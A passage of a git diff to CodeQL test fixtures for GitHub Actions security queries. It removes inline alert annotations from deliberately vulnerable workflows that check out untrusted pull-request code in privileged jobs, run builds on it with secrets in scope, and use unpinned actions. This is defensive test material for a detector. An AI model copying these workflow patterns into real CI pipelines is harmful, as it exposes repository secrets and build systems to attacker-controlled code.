b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] + - name: Read .nvmrc id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 308cc9fde518..1bda517c9a12 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-java@v4 with: distribution: temurin java-version: 17 @@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] + - name: Merge Dependabot pull request if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index b338fbc5f16b..3b8a6d6dd62a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | # $ Alert[actions/untrusted-checkout/critical] + - run: | npm install npm run lint - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index f34f96996c50..ab121239c6e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 @@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-node@v1 # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build # $ Sink[actions/untrusted-checkout/critical] + npm build diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 984c56d9028d..221854ec2042 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] + uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] + uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] + uses: eficode/resolve-pr-refs@main with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index 133d033a4e9e..ece4c02c3565 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: # $ Alert[actions/untrusted-checkout/high] + test3: runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: # $ Alert[actions/untrusted-checkout/high] + test4: runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: # $ Alert[actions/untrusted-checkout/high] + test5: runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 6dd5205c08e3..8c0865f598cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ steps.vars.outputs.branch }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index b25d53c739ee..ac013eb6e2f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v4 with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: # $ Alert[actions/untrusted-checkout/high] + test3: if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: # $ Alert[actions/untrusted-checkout/high] + test4: if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: # $ Alert[actions/untrusted-checkout/high] + test5: runs-on: ubuntu-20.04 steps: - id: request @@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 0831bc9217cb..8485ad0ed671 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] + - name: Checkout PR minor patch wildcard - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] + - name: Checkout PR minor wildcard incomplete patch uses: actions/checkout@v2.x. - - name: Run latest action # $ Alert[actions/unversioned-immutable-action] - uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] + - name: Run latest action + uses: some-action/some-repo@latest with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 32cef70963ae..56bb143cf367 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index fef28af7925d..6014d08ed806 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-node@v1 - run: | npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 47aa7725a812..49908b7b4c51 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] + - uses: rlespinasse/github-slug-action@v4 with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: # $ Sink[actions/untrusted-checkout/critical] + toppings: runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/untrusted-checkout/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index dbeeb1e0eebc..b539c562084e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] + - name: "setup ruby" if: success() - uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] + uses: "ruby/setup-ruby@v1" with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 4035b3fb4643..6900c3bc23fa 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - name: Setup Pages uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] + - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: # $ Alert[actions/unversioned-immutable-action] + deploy: environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' # $ Alert[actions/unversioned-immutable-action] + preview: 'true' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 9ecc8c2367bb..5501beb9ea2f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] + - name: bootstrap if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out # $ Sink[actions/untrusted-checkout/critical] + rm deploy.out diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 39fc63beb3f9..4d5ae1f528cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout # $ Alert[actions/untrusted-checkout/medium] + - name: Checkout if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index a89f4ef3031f..061ff7d02c5e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] + - uses: amannn/action-semantic-pull-request@v5 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: actionsdesk/lfs-warning@v3.2 name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: cachix/install-nix-action@v20 with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] - - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: @@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] + - name: build-all-deps-packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] + uses: docker/login-action@v2 with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] + uses: softprops/action-gh-release@v1 with: draft: true prerelease: false @@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish cmc-api to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish devnet-xc to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] + mantis-e2e: name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} @@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: cachix/install-nix-action@v20 with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] - - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index 54f740735e25..d8381176fd23 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - run: | ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 407659f09db5..72db8c29370d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] + - if: github.event_name == 'workflow_run' uses: ./.github/actions/download-artifact - id: resolve-step env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml index b338fbc5f16b..3b8a6d6dd62a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | # $ Alert[actions/untrusted-checkout/critical] + - run: | npm install npm run lint - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml index 8bdb8fc75ede..e8b5466f7516 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build # $ Alert[actions/untrusted-checkout/critical] + - name: Build working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] + dependabot-auto-merge: if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml index 448654fe45d8..16bb6bf876c3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + - name: Environment setup uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical] + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml index 9f0ee5cf96d9..878b83779613 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Alert[actions/unversioned-immutable-action] + - name: Environment setup uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml index c8a68d73e588..0a73e86d5fc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] + uses: sushichop/action-repository-permission@v2 with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/setup-node@v3 with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 15ab46cc70a1..6f03a0e966a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] + - name: Checkout PR branch if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] + - name: Get environment from comment id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index ef42bbb4a3c5..0be96a4140ef 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] + - name: Install GH CLI uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure # 